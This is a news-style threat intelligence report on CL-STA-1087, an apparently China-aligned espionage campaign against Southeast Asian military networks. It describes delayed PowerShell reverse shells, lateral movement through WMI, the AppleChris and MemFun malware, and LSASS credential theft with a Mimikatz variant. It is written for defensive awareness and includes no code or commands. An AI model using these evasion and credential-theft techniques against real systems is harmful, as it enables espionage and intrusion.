A sophisticated cyber espionage campaign has breached military systems across Southeast Asia. The operation, tracked as CL-STA-1087, has reportedly been active since at least 2020. It has quietly targeted sensitive military networks without drawing immediate attention.
This was not a disruptive cyberattack. There were no sudden shutdowns or visible damage. Instead, the attackers focused on staying hidden and collecting information over time. Their goal was to understand military systems rather than interfere with them.
The campaign came to light when security systems detected unusual PowerShell activity. These commands are normally used for system management. In this case, they were being used to run hidden scripts. By the time investigators began examining the issue, parts of the network had already been compromised.
The attackers focused on high-value targets. These included command and control systems, internal military structures, and joint operations data. Such information can reveal how military forces are organized and how they respond to different situations.
Investigators assess with moderate confidence that the activity is linked to a China-aligned threat actor. This is based on patterns in behavior and infrastructure, though no specific group has been officially named.
Entry Methods and Initial Network Compromise
The attackers used carefully planned methods to enter the systems. They deployed delayed PowerShell scripts that did not activate immediately. These scripts often remained inactive for several hours, helping them avoid automated security detection.
Once activated, the scripts created reverse shells. This allowed the attackers to remotely access and control infected systems. They connected to multiple command-and-control servers, which acted as central hubs for their operations.
The initial breach often occurred through unmanaged endpoints. These are devices that are not closely monitored by security systems. Such entry points made it easier for attackers to access larger networks.
After gaining access, the attackers avoided sudden movements. Their approach was slow and controlled. This helped them stay unnoticed while expanding their reach inside the network.
Stealth Tactics and Long-Term Persistence
One of the key features of this campaign was its patience. The attackers often remained completely inactive for months after gaining access. This dormancy made detection extremely difficult.
When they resumed activity, they moved laterally across systems. They used legitimate tools such as Windows Management Instrumentation and .NET commands. These tools are commonly used by system administrators, which helped the attackers blend in.
This method is often called “living off the land.”
The attackers also minimized their digital footprint. Their actions were designed to look like routine system behavior. This made it harder for traditional security systems to identify unusual activity.
Custom Malware and Data Extraction Techniques
The attackers used several advanced tools to maintain access and collect data. One of the main tools was a backdoor known as AppleChris. This malware enabled hidden communication with command servers.
AppleChris used a dead drop resolver technique. It retrieved encoded instructions from public platforms like Pastebin and Dropbox. The data was then decrypted using a private key, making it difficult to track.
Another tool, MemFun, operated entirely in system memory. It did not write files to the disk, which helped it avoid detection. It also hid inside legitimate system processes, such as the Windows DLL host.
MemFun used dynamically generated Blowfish encryption keys for each session. This ensured that network traffic remained difficult to analyze.
For credential theft, the attackers used a modified version of Mimikatz called Getpass. This tool targeted the Windows LSASS process to extract passwords and authentication data.
The stolen information was stored in a file named WinSAT.db, which appeared to be a normal system file. This helped the attackers hide their activity.
Investigators also found signs pointing to a China-linked origin. The attackers operated during UTC+8 working hours, used China-based infrastructure, and included Simplified Chinese elements in their command environment.
